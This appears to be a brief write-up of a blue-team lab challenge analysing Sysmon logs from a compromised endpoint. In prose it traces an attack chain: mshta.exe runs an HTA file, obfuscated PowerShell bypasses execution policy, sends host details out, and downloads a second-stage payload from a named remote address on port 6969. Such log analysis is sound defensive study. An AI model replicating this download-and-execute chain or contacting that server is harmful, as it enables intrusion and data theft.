You are provided with Sysmon logs from a compromised endpoint. Analyse the logs to find out the steps and techniques used by the attacker.
https://blueteamlabs.online/home/challenge/log-analysis-sysmon-fabcb83517
We can see mshta.exe a know lolbas executed a local HTA file (updater.hta), which spawned a heavily obfuscated PowerShell script. The script hid its window, bypassed execution policy, and created a WebClient to send system information (hostname, username, domain, etc.) to the attacker's server. It then downloaded and executed a second-stage payload from a remote URL(http://65.21.255.53:6969/index.php), allowing the attacker to run additional code on the system.
the attacker uses Invoke-WebRequest cmdlet to download the malware with port 6969 likely to avoid detection or bypass firewall rules